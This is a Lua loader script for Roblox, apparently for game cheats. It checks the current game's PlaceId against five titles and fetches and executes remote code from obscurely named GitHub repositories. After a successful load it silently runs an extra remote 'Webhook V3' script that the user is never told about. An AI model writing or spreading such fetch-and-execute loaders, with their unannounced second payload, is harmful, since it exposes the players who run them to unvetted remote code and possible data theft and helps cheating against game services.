--[[ 

███╗   ██╗███████╗██╗  ██╗ █████╗  
████╗  ██║██╔════╝╚██╗██╔╝██╔══██╗ 
██╔██╗ ██║█████╗   ╚███╔╝ ███████║ 
██║╚██╗██║██╔══╝   ██╔██╗ ██╔══██║ 
██║ ╚████║███████╗██╔╝ ██╗██║  ██║ 
╚═╝  ╚═══╝╚══════╝╚═╝  ╚═╝╚═╝  ╚═╝ 

]]

-- Tunggu sampai game siap
repeat task.wait() until game.Players.LocalPlayer and game.Players.LocalPlayer.Character
if not game:IsLoaded() then game.Loaded:Wait() end

print("Supported loader system running...")

local placeId = game.PlaceId

-- Daftar game dan script URL
local games = {
    ["FishIt"] = {
        placeIds = {121864768012064},
        url = "https://raw.githubusercontent.com/fewnbhefbevfhevfdfveh/ckhsuciceifgeufhefveyfg/refs/heads/main/sjfeufeufegfefy"
    },
    ["Prospecting"] = {
        placeIds = {129827112113663},
        url = "https://raw.githubusercontent.com/fewnbhefbevfhevfdfveh/ckhsuciceifgeufhefveyfg/refs/heads/main/ewfheufefgeufg"
    },
    ["PlantVsBrainrot"] = {
        placeIds = {127742093697776},
        url = "https://raw.githubusercontent.com/fewnbhefbevfhevfdfveh/ckhsuciceifgeufhefveyfg/refs/heads/main/wfnwefjwewidjeuf"
    },
    ["99 Nights"] = {
        placeIds = {126509999114328},
        url = "https://raw.githubusercontent.com/fewnbhefbevfhevfdfveh/ckhsuciceifgeufhefveyfg/refs/heads/main/fwfewfefef99%20Nig"
    },
    ["Fisch"] = {
        placeIds = {16732694052, 131716211654599},
        url = "https://raw.githubusercontent.com/fewnbhefbevfhevfdfveh/ckhsuciceifgeufhefveyfg/refs/heads/main/wjdgydfwydwyFISCH"
    }
}

-- Cari script sesuai PlaceId
local scriptUrl
for _, gameInfo in pairs(games) do
    if table.find(gameInfo.placeIds, placeId) then
        scriptUrl = gameInfo.url
        break
    end
end

-- Jalankan script utama
if scriptUrl then
    local success, err = pcall(function()
        loadstring(game:HttpGet(scriptUrl))()
    end)

    if success then
        -- Auto eksekusi Webhook V3
        task.delay(2, function()
            local webhookUrl = "https://raw.githubusercontent.com/hdgsydgdgdy1233/Loaderlua/refs/heads/main/Webhook%20v3"
            pcall(function()
                loadstring(game:HttpGet(webhookUrl))()
            end)
        end)

    else
        warn("Failed to load script:", err)
    end
else
    warn("Unsupported game. PlaceId:", placeId)
end
